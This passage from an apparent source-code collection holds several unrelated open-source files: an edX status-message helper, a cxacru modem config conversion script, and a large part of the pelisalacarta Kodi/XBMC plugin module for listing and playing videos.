%s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0]) code += "return 0;}\n" return code
gpl-3.0
cyanna/edx-platform
common/djangoapps/status/status.py
48
1463
""" A tiny app that checks for a status message. """ from django.conf import settings from django.core.cache import cache import json import logging import os log = logging.getLogger(__name__) def get_site_status_msg(course_id): """ Look for a file settings.STATUS_MESSAGE_PATH. If found, read it, parse as json, and do the following: * if there is a key 'global', include that in the result list. * if course is not None, and there is a key for course.id, add that to the result list. * return "<br/>".join(result) Otherwise, return None. If something goes wrong, returns None. ("is there a status msg?" logic is not allowed to break the entire site). """ try: # first check for msg in cache msg = cache.get('site_status_msg') if msg is not None: return msg if os.path.isfile(settings.STATUS_MESSAGE_PATH): with open(settings.STATUS_MESSAGE_PATH) as f: content = f.read() else: return None status_dict = json.loads(content) msg = status_dict.get('global', None) if course_id in status_dict: msg = msg + "<br>" if msg else '' msg += status_dict[course_id] # set msg to cache, with expiry 5 mins cache.set('site_status_msg', msg, 60 * 5) return msg except: log.exception("Error while getting a status message.") return None
agpl-3.0
djmatt604/android_kernel_T989D_JB
Documentation/networking/cxacru-cf.py
14668
1626
#!/usr/bin/env python # Copyright 2009 Simon Arlott # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the Free # Software Foundation; either version 2 of the License, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for # more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., 59 # Temple Place - Suite 330, Boston, MA 02111-1307, USA. # # Usage: cxacru-cf.py < cxacru-cf.bin # Output: values string suitable for the sysfs adsl_config attribute # # Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110 # contains mis-aligned values which will stop the modem from being able # to make a connection. If the first and last two bytes are removed then # the values become valid, but the modulation will be forced to ANSI # T1.413 only which may not be appropriate. # # The original binary format is a packed list of le32 values. import sys import struct i = 0 while True: buf = sys.stdin.read(4) if len(buf) == 0: break elif len(buf) != 4: sys.stdout.write("\n") sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf))) sys.exit(1) if i > 0: sys.stdout.write(" ") sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0])) i += 1 sys.stdout.write("\n")
gpl-2.0
Ditmar/plugin.video.pelisalacarta
platformcode/xbmc/xbmctools.py
7
47971
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # XBMC Tools # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urllib, urllib2 import xbmc import xbmcgui import xbmcplugin import sys import os from servers import servertools from core import config from core import logger # Esto permite su ejecución en modo emulado try: pluginhandle = int( sys.argv[ 1 ] ) except: pluginhandle = "" DEBUG = True # TODO: (3.2) Esto es un lío, hay que unificar def addnewfolder( canal , accion , category , title , url , thumbnail , plot , Serie="",totalItems=0,fanart="",context="", show="",fulltitle=""): if fulltitle=="": fulltitle=title ok = addnewfolderextra( canal , accion , category , title , url , thumbnail , plot , "" ,Serie,totalItems,fanart,context,show, fulltitle) return ok def addnewfolderextra( canal , accion , category , title , url , thumbnail , plot , extradata ,Serie="",totalItems=0,fanart="",context="",show="",fulltitle=""): if fulltitle=="": fulltitle=title contextCommands = [] ok = False try: context = urllib.unquote_plus(context) except: context="" if "|" in context: context = context.split("|") if DEBUG: try: logger.info('[xbmctools.py] addnewfolderextra( "'+extradata+'","'+canal+'" , "'+accion+'" , "'+category+'" , "'+title+'" , "' + url + '" , "'+thumbnail+'" , "'+plot+'")" , "'+Serie+'")"') except: logger.info('[xbmctools.py] addnewfolder(<unicode>)') listitem = xbmcgui.ListItem( title, iconImage="DefaultFolder.png", thumbnailImage=thumbnail ) listitem.setInfo( "video", { "Title" : title, "Plot" : plot, "Studio" : canal } ) if fanart!="": listitem.setProperty('fanart_image',fanart) xbmcplugin.setPluginFanart(pluginhandle, fanart) #Realzamos un quote sencillo para evitar problemas con títulos unicode # title = title.replace("&","%26").replace("+","%2B").replace("%","%25") try: title = title.encode ("utf-8") #This only aplies to unicode strings. The rest stay as they are. except: pass itemurl = '%s?fanart=%s&channel=%s&action=%s&category=%s&title=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&extradata=%s&Serie=%s&show=%s' % ( sys.argv[ 0 ] , fanart, canal , accion , urllib.quote_plus( category ) , urllib.quote_plus(title) , urllib.quote_plus(fulltitle) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , urllib.quote_plus( extradata ) , Serie, urllib.quote_plus( show )) if Serie != "": #Añadimos opción contextual para Añadir la serie completa a la biblioteca addSerieCommand = "XBMC.RunPlugin(%s?channel=%s&action=addlist2Library&category=%s&title=%s&fulltitle=%s&url=%s&extradata=%s&Serie=%s&show=%s)" % ( sys.argv[ 0 ] , canal , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus(fulltitle) , urllib.quote_plus( url ) , urllib.quote_plus( extradata ) , Serie, urllib.quote_plus( show ) ) contextCommands.append(("Añadir Serie a Biblioteca",addSerieCommand)) if "1" in context and accion != "por_teclado": DeleteCommand = "XBMC.RunPlugin(%s?channel=buscador&action=borrar_busqueda&title=%s&url=%s&show=%s)" % ( sys.argv[ 0 ] , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( show ) ) contextCommands.append((config.get_localized_string( 30300 ),DeleteCommand)) if "4" in context: searchSubtitleCommand = "XBMC.RunPlugin(%s?channel=subtitletools&action=searchSubtitle&title=%s&url=%s&category=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&extradata=%s&Serie=%s&show=%s)" % ( sys.argv[ 0 ] , urllib.quote_plus( title ) , urllib.quote_plus( url ), urllib.quote_plus( category ), urllib.quote_plus(fulltitle) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , urllib.quote_plus( extradata ) , Serie, urllib.quote_plus( show ) ) contextCommands.append(("XBMC Subtitle",searchSubtitleCommand)) if "5" in context: trailerCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "trailertools" , "buscartrailer" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30162),trailerCommand)) if "6" in context: justinCommand = "XBMC.PlayMedia(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "playVideo" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30410),justinCommand)) if "8" in context:# Añadir canal a favoritos justintv justinCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "addToFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30406),justinCommand)) if "9" in context:# Remover canal de favoritos justintv justinCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "removeFromFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30407),justinCommand)) if config.get_platform()=="boxee": #logger.info("Modo boxee") ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) else: #logger.info("Modo xbmc") if len(contextCommands) > 0: listitem.addContextMenuItems ( contextCommands, replaceItems=False) if totalItems == 0: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) else: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True, totalItems=totalItems) return ok def addnewvideo( canal , accion , category , server , title , url , thumbnail, plot ,Serie="",duration="",fanart="",IsPlayable='false',context = "", subtitle="", viewmode="", totalItems = 0, show="", password="", extra="",fulltitle=""): contextCommands = [] ok = False try: context = urllib.unquote_plus(context) except: context="" if "|" in context: context = context.split("|") if DEBUG: try: logger.info('[xbmctools.py] addnewvideo( "'+canal+'" , "'+accion+'" , "'+category+'" , "'+server+'" , "'+title+'" ("'+fulltitle+'") , "' + url + '" , "'+thumbnail+'" , "'+plot+'")" , "'+Serie+'")"') except: logger.info('[xbmctools.py] addnewvideo(<unicode>)') icon_image = os.path.join( config.get_runtime_path() , "resources" , "images" , "servers" , server+".png" ) if not os.path.exists(icon_image): icon_image = "DefaultVideo.png" listitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail ) listitem.setInfo( "video", { "Title" : title, "FileName" : title, "Plot" : plot, "Duration" : duration, "Studio" : canal, "Genre" : category } ) if fanart!="": #logger.info("fanart :%s" %fanart) listitem.setProperty('fanart_image',fanart) xbmcplugin.setPluginFanart(pluginhandle, fanart) if IsPlayable == 'true': #Esta opcion es para poder utilizar el xbmcplugin.setResolvedUrl() listitem.setProperty('IsPlayable', 'true') #listitem.setProperty('fanart_image',os.path.join(IMAGES_PATH, "cinetube.png")) if "1" in context: #El uno añade al menu contextual la opcion de guardar en megalive un canal a favoritos addItemCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&show=%s&password=%s&extradata=%s)" % ( sys.argv[ 0 ] , canal , "saveChannelFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie, urllib.quote_plus(show), urllib.quote_plus( password) , urllib.quote_plus(extra) ) contextCommands.append((config.get_localized_string(30301),addItemCommand)) if "2" in context:#El dos añade al menu contextual la opciones de eliminar y/o renombrar un canal en favoritos addItemCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&show=%s&password=%s&extradata=%s)" % ( sys.argv[ 0 ] , canal , "deleteSavedChannel" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie, urllib.quote_plus( show), urllib.quote_plus( password) , urllib.quote_plus(extra) ) contextCommands.append((config.get_localized_string(30302),addItemCommand)) addItemCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&show=%s&password=%s&extradata=%s)" % ( sys.argv[ 0 ] , canal , "renameChannelTitle" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie, urllib.quote_plus( show),urllib.quote_plus( password) , urllib.quote_plus(extra) ) contextCommands.append((config.get_localized_string(30303),addItemCommand)) if "6" in context:# Ver canal en vivo en justintv justinCommand = "XBMC.PlayMedia(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "playVideo" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) ) contextCommands.append((config.get_localized_string(30410),justinCommand)) if "7" in context:# Listar videos archivados en justintv justinCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "listarchives" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30409),justinCommand)) if "8" in context:# Añadir canal a favoritos justintv justinCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "addToFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30406),justinCommand)) if "9" in context:# Remover canal de favoritos justintv justinCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "removeFromFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30407),justinCommand)) if len (contextCommands) > 0: listitem.addContextMenuItems ( contextCommands, replaceItems=False) try: title = title.encode ("utf-8") #This only aplies to unicode strings. The rest stay as they are. plot = plot.encode ("utf-8") except: pass itemurl = '%s?fanart=%s&channel=%s&action=%s&category=%s&title=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&subtitle=%s&viewmode=%s&show=%s&extradata=%s' % ( sys.argv[ 0 ] , fanart, canal , accion , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie , urllib.quote_plus(subtitle), urllib.quote_plus(viewmode), urllib.quote_plus( show ) , urllib.quote_plus(extra) ) #logger.info("[xbmctools.py] itemurl=%s" % itemurl) if totalItems == 0: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url=itemurl, listitem=listitem, isFolder=False) else: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url=itemurl, listitem=listitem, isFolder=False, totalItems=totalItems) return ok def addthumbnailfolder( canal , scrapedtitle , scrapedurl , scrapedthumbnail , accion ): logger.info('[xbmctools.py] addthumbnailfolder( "'+scrapedtitle+'" , "' + scrapedurl + '" , "'+scrapedthumbnail+'" , "'+accion+'")"') listitem = xbmcgui.ListItem( scrapedtitle, iconImage="DefaultFolder.png", thumbnailImage=scrapedthumbnail ) itemurl = '%s?channel=%s&action=%s&category=%s&url=%s&title=%s&thumbnail=%s' % ( sys.argv[ 0 ] , canal , accion , urllib.quote_plus( scrapedtitle ) , urllib.quote_plus( scrapedurl ) , urllib.quote_plus( scrapedtitle ) , urllib.quote_plus( scrapedthumbnail ) ) xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) def addfolder( canal , nombre , url , accion ): logger.info('[xbmctools.py] addfolder( "'+nombre+'" , "' + url + '" , "'+accion+'")"') listitem = xbmcgui.ListItem( nombre , iconImage="DefaultFolder.png") itemurl = '%s?channel=%s&action=%s&category=%s&url=%s' % ( sys.argv[ 0 ] , canal , accion , urllib.quote_plus(nombre) , urllib.quote_plus(url) ) xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) def addvideo( canal , nombre , url , category , server , Serie=""): logger.info('[xbmctools.py] addvideo( "'+nombre+'" , "' + url + '" , "'+server+ '" , "'+Serie+'")"') listitem = xbmcgui.ListItem( nombre, iconImage="DefaultVideo.png" ) listitem.setInfo( "video", { "Title" : nombre, "Plot" : nombre } ) itemurl = '%s?channel=%s&action=play&category=%s&url=%s&server=%s&title=%s&Serie=%s' % ( sys.argv[ 0 ] , canal , category , urllib.quote_plus(url) , server , urllib.quote_plus( nombre ) , Serie) xbmcplugin.addDirectoryItem( handle=pluginhandle, url=itemurl, listitem=listitem, isFolder=False) # FIXME: ¿Por qué no pasar el item en lugar de todos los parámetros? def play_video(channel="",server="",url="",category="",title="", thumbnail="",plot="",extra="",desdefavoritos=False,desdedescargados=False,desderrordescargas=False,strmfile=False,Serie="",subtitle="", video_password="",fulltitle=""): from servers import servertools import sys import xbmcgui,xbmc try: logger.info("[xbmctools.py] play_video(channel=%s, server=%s, url=%s, category=%s, title=%s, thumbnail=%s, plot=%s, desdefavoritos=%s, desdedescargados=%s, desderrordescargas=%s, strmfile=%s, Serie=%s, subtitle=%s" % (channel,server,url,category,title,thumbnail,plot,desdefavoritos,desdedescargados,desderrordescargas,strmfile,Serie,subtitle)) except: pass try: server = server.lower() except: server = "" if server=="": server="directo" try: from core import descargas download_enable=True except: download_enable=False view = False # Abre el diálogo de selección opciones = [] default_action = config.get_setting("default_action") logger.info("default_action="+default_action) # Si no es el modo normal, no muestra el diálogo porque cuelga XBMC muestra_dialogo = (config.get_setting("player_mode")=="0" and not strmfile) # Extrae las URL de los vídeos, y si no puedes verlo te dice el motivo video_urls,puedes,motivo = servertools.resolve_video_urls_for_playing(server,url,video_password,muestra_dialogo) # Si puedes ver el vídeo, presenta las opciones if puedes: for video_url in video_urls: opciones.append(config.get_localized_string(30151) + " " + video_url[0]) if server=="local": opciones.append(config.get_localized_string(30164)) else: if download_enable: opcion = config.get_localized_string(30153) opciones.append(opcion) # "Descargar" if channel=="favoritos": opciones.append(config.get_localized_string(30154)) # "Quitar de favoritos" else: opciones.append(config.get_localized_string(30155)) # "Añadir a favoritos" if not strmfile: opciones.append(config.get_localized_string(30161)) # "Añadir a Biblioteca" if download_enable: if channel!="descargas": opciones.append(config.get_localized_string(30157)) # "Añadir a lista de descargas" else: if category=="errores": opciones.append(config.get_localized_string(30159)) # "Borrar descarga definitivamente" opciones.append(config.get_localized_string(30160)) # "Pasar de nuevo a lista de descargas" else: opciones.append(config.get_localized_string(30156)) # "Quitar de lista de descargas" if config.get_setting("jdownloader_enabled")=="true": opciones.append(config.get_localized_string(30158)) # "Enviar a JDownloader" if config.get_setting("pyload_enabled")=="true": opciones.append(config.get_localized_string(30158).replace("jDownloader","pyLoad")) # "Enviar a pyLoad" if default_action=="3": seleccion = len(opciones)-1 # Busqueda de trailers en youtube if not channel in ["Trailer","ecarteleratrailers"]: opciones.append(config.get_localized_string(30162)) # "Buscar Trailer" # Si no puedes ver el vídeo te informa else: import xbmcgui if server!="": advertencia = xbmcgui.Dialog() if "<br/>" in motivo: resultado = advertencia.ok( "No puedes ver ese vídeo porque...",motivo.split("<br/>")[0],motivo.split("<br/>")[1],url) else: resultado = advertencia.ok( "No puedes ver ese vídeo porque...",motivo,url) else: resultado = advertencia.ok( "No puedes ver ese vídeo porque...","El servidor donde está alojado no está","soportado en pelisalacarta todavía",url) if channel=="favoritos": opciones.append(config.get_localized_string(30154)) # "Quitar de favoritos" if channel=="descargas": if category=="errores": opciones.append(config.get_localized_string(30159)) # "Borrar descarga definitivamente" else: opciones.append(config.get_localized_string(30156)) # "Quitar de lista de descargas" if len(opciones)==0: return # Si la accion por defecto es "Preguntar", pregunta if default_action=="0": # and server!="torrent": import xbmcgui dia = xbmcgui.Dialog() seleccion = dia.select(config.get_localized_string(30163), opciones) # "Elige una opción" #dia.close() ''' elif default_action=="0" and server=="torrent": advertencia = xbmcgui.Dialog() logger.info("video_urls[0]="+str(video_urls[0][1])) if puedes and ('"status":"COMPLETED"' in video_urls[0][1] or '"percent_done":100' in video_urls[0][1]): listo = "y está listo para ver" else: listo = "y se está descargando" resultado = advertencia.ok( "Torrent" , "El torrent ha sido añadido a la lista" , listo ) seleccion=-1 ''' elif default_action=="1": seleccion = 0 elif default_action=="2": seleccion = len(video_urls)-1 elif default_action=="3": seleccion = seleccion else: seleccion=0 logger.info("seleccion=%d" % seleccion) logger.info("seleccion=%s" % opciones[seleccion]) # No ha elegido nada, lo más probable porque haya dado al ESC if seleccion==-1: #Para evitar el error "Uno o más elementos fallaron" al cancelar la selección desde fichero strm listitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail) import sys xbmcplugin.setResolvedUrl(int(sys.argv[ 1 ]),False,listitem) # JUR Added #if config.get_setting("subtitulo") == "true": # config.set_setting("subtitulo", "false") return if opciones[seleccion]==config.get_localized_string(30158): # "Enviar a JDownloader" #d = {"web": url}urllib.urlencode(d) from core import scrapertools if subtitle!="": data = scrapertools.cachePage(config.get_setting("jdownloader")+"/action/add/links/grabber0/start1/web="+url+ " " +thumbnail + " " + subtitle) else: data = scrapertools.cachePage(config.get_setting("jdownloader")+"/action/add/links/grabber0/start1/web="+url+ " " +thumbnail) return if opciones[seleccion]==config.get_localized_string(30158).replace("jDownloader","pyLoad"): # "Enviar a pyLoad" logger.info("Enviando a pyload...") if Serie!="": package_name = Serie else: package_name = "pelisalacarta" from core import pyload_client pyload_client.download(url=url,package_name=package_name) return elif opciones[seleccion]==config.get_localized_string(30164): # Borrar archivo en descargas # En "extra" está el nombre del fichero en favoritos import os os.remove( url ) xbmc.executebuiltin( "Container.Refresh" ) return # Ha elegido uno de los vídeos elif seleccion < len(video_urls): mediaurl = video_urls[seleccion][1] if len(video_urls[seleccion])>2: wait_time = video_urls[seleccion][2] else: wait_time = 0 view = True # Descargar elif opciones[seleccion]==config.get_localized_string(30153): # "Descargar" import xbmc # El vídeo de más calidad es el último mediaurl = video_urls[len(video_urls)-1][1] from core import downloadtools keyboard = xbmc.Keyboard(fulltitle) keyboard.doModal() if (keyboard.isConfirmed()): title = keyboard.getText() devuelve = downloadtools.downloadbest(video_urls,title) if devuelve==0: advertencia = xbmcgui.Dialog() resultado = advertencia.ok("plugin" , "Descargado con éxito") elif devuelve==-1: advertencia = xbmcgui.Dialog() resultado = advertencia.ok("plugin" , "Descarga abortada") else: advertencia = xbmcgui.Dialog() resultado = advertencia.ok("plugin" , "Error en la descarga") return elif opciones[seleccion]==config.get_localized_string(30154): #"Quitar de favoritos" from core import favoritos # En "extra" está el nombre del fichero en favoritos favoritos.deletebookmark(urllib.unquote_plus( extra )) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30102) , title , config.get_localized_string(30105)) # 'Se ha quitado de favoritos' xbmc.executebuiltin( "Container.Refresh" ) return elif opciones[seleccion]==config.get_localized_string(30159): #"Borrar descarga definitivamente" from core import descargas descargas.delete_error_bookmark(urllib.unquote_plus( extra )) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30106)) # 'Se ha quitado de la lista' xbmc.executebuiltin( "Container.Refresh" ) return elif opciones[seleccion]==config.get_localized_string(30160): #"Pasar de nuevo a lista de descargas": from core import descargas descargas.mover_descarga_error_a_pendiente(urllib.unquote_plus( extra )) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30107)) # 'Ha pasado de nuevo a la lista de descargas' return elif opciones[seleccion]==config.get_localized_string(30155): #"Añadir a favoritos": from core import favoritos from core import downloadtools keyboard = xbmc.Keyboard(downloadtools.limpia_nombre_excepto_1(fulltitle)+" ["+channel+"]") keyboard.doModal() if keyboard.isConfirmed(): title = keyboard.getText() favoritos.savebookmark(titulo=title,url=url,thumbnail=thumbnail,server=server,plot=plot,fulltitle=title) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30102) , title , config.get_localized_string(30108)) # 'se ha añadido a favoritos' return elif opciones[seleccion]==config.get_localized_string(30156): #"Quitar de lista de descargas": from core import descargas # La categoría es el nombre del fichero en la lista de descargas descargas.deletebookmark((urllib.unquote_plus( extra ))) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30106)) # 'Se ha quitado de lista de descargas' xbmc.executebuiltin( "Container.Refresh" ) return elif opciones[seleccion]==config.get_localized_string(30157): #"Añadir a lista de descargas": from core import descargas from core import downloadtools keyboard = xbmc.Keyboard(downloadtools.limpia_nombre_excepto_1(fulltitle)) keyboard.doModal() if keyboard.isConfirmed(): title = keyboard.getText() descargas.savebookmark(titulo=title,url=url,thumbnail=thumbnail,server=server,plot=plot,fulltitle=title) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30109)) # 'se ha añadido a la lista de descargas' return elif opciones[seleccion]==config.get_localized_string(30161): #"Añadir a Biblioteca": # Library from platformcode.xbmc import library titulo = fulltitle if fulltitle=="": titulo = title library.savelibrary(titulo,url,thumbnail,server,plot,canal=channel,category=category,Serie=Serie) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , fulltitle , config.get_localized_string(30135)) # 'se ha añadido a la lista de descargas' return elif opciones[seleccion]==config.get_localized_string(30162): #"Buscar Trailer": config.set_setting("subtitulo", "false") import sys xbmc.executebuiltin("Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s)" % ( sys.argv[ 0 ] , "trailertools" , "buscartrailer" , urllib.quote_plus( category ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) , server )) return # Si no hay mediaurl es porque el vídeo no está :) logger.info("[xbmctools.py] mediaurl="+mediaurl) if mediaurl=="": logger.info("b1") if server == "unknown": alertUnsopportedServer() else: alertnodisponibleserver(server) return # Si hay un tiempo de espera (como en megaupload), lo impone ahora if wait_time>0: logger.info("b2") continuar = handle_wait(wait_time,server,"Cargando vídeo...") if not continuar: return # Obtención datos de la Biblioteca (solo strms que estén en la biblioteca) import xbmcgui if strmfile: logger.info("b3") xlistitem = getLibraryInfo(mediaurl) else: logger.info("b4") try: xlistitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail, path=mediaurl) except: xlistitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail) xlistitem.setInfo( "video", { "Title": title, "Plot" : plot , "Studio" : channel , "Genre" : category } ) # Descarga el subtitulo if channel=="cuevana" and subtitle!="" and (opciones[seleccion].startswith("Ver") or opciones[seleccion].startswith("Watch")): logger.info("b5") try: import os ficherosubtitulo = os.path.join( config.get_data_path(), 'subtitulo.srt' ) if os.path.exists(ficherosubtitulo): try: os.remove(ficherosubtitulo) except IOError: logger.info("Error al eliminar el archivo subtitulo.srt "+ficherosubtitulo) raise from core import scrapertools data = scrapertools.cache_page(subtitle) #print data fichero = open(ficherosubtitulo,"w") fichero.write(data) fichero.close() #from core import downloadtools #downloadtools.downloadfile(subtitle, ficherosubtitulo ) except: logger.info("Error al descargar el subtítulo") # Lanza el reproductor if strmfile: #Si es un fichero strm no hace falta el play logger.info("b6") import sys xbmcplugin.setResolvedUrl(int(sys.argv[ 1 ]),True,xlistitem) #if subtitle!="" and (opciones[seleccion].startswith("Ver") or opciones[seleccion].startswith("Watch")): # logger.info("[xbmctools.py] Con subtitulos") # setSubtitles() else: logger.info("b7") logger.info("player_mode="+config.get_setting("player_mode")) logger.info("mediaurl="+mediaurl) if config.get_setting("player_mode")=="3" or "megacrypter.com" in mediaurl: logger.info("b11") import download_and_play download_and_play.download_and_play( mediaurl , "download_and_play.tmp" , config.get_setting("downloadpath") ) return elif config.get_setting("player_mode")=="0" or (config.get_setting("player_mode")=="3" and mediaurl.startswith("rtmp")): logger.info("b8") # Añadimos el listitem a una lista de reproducción (playlist) playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO ) playlist.clear() playlist.add( mediaurl, xlistitem ) # Reproduce playersettings = config.get_setting('player_type') logger.info("[xbmctools.py] playersettings="+playersettings) player_type = xbmc.PLAYER_CORE_AUTO if playersettings == "0": player_type = xbmc.PLAYER_CORE_AUTO logger.info("[xbmctools.py] PLAYER_CORE_AUTO") elif playersettings == "1": player_type = xbmc.PLAYER_CORE_MPLAYER logger.info("[xbmctools.py] PLAYER_CORE_MPLAYER") elif playersettings == "2": player_type = xbmc.PLAYER_CORE_DVDPLAYER logger.info("[xbmctools.py] PLAYER_CORE_DVDPLAYER") xbmcPlayer = xbmc.Player( player_type ) xbmcPlayer.play(playlist) if channel=="cuevana" and subtitle!="": logger.info("subtitulo="+subtitle) if subtitle!="" and (opciones[seleccion].startswith("Ver") or opciones[seleccion].startswith("Watch")): logger.info("[xbmctools.py] Con subtitulos") setSubtitles() elif config.get_setting("player_mode")=="1": logger.info("b9") #xlistitem.setProperty('IsPlayable', 'true') #xlistitem.setProperty('path', mediaurl) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, xbmcgui.ListItem(path=mediaurl)) elif config.get_setting("player_mode")=="2": logger.info("b10") xbmc.executebuiltin( "PlayMedia("+mediaurl+")" ) # Descarga en segundo plano para vidxden, sólo en modo free ''' elif server=="vidxden" and seleccion==0: from core import downloadtools import thread,os import xbmc logger.info("[xbmctools.py] ---------------------------------") logger.info("[xbmctools.py] DESCARGA EN SEGUNDO PLANO") logger.info("[xbmctools.py] de "+mediaurl) temp_file = config.get_temp_file("background.file") if os.path.exists(temp_file): os.remove(temp_file) logger.info("[xbmctools.py] a "+temp_file) logger.info("[xbmctools.py] ---------------------------------") thread.start_new_thread(downloadtools.downloadfile, (mediaurl,temp_file), {'silent':True}) handle_wait(60,"Descarga en segundo plano","Se está descargando un trozo antes de empezar") playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO ) playlist.clear() playlist.add( temp_file, xlistitem ) player_type = xbmc.PLAYER_CORE_AUTO 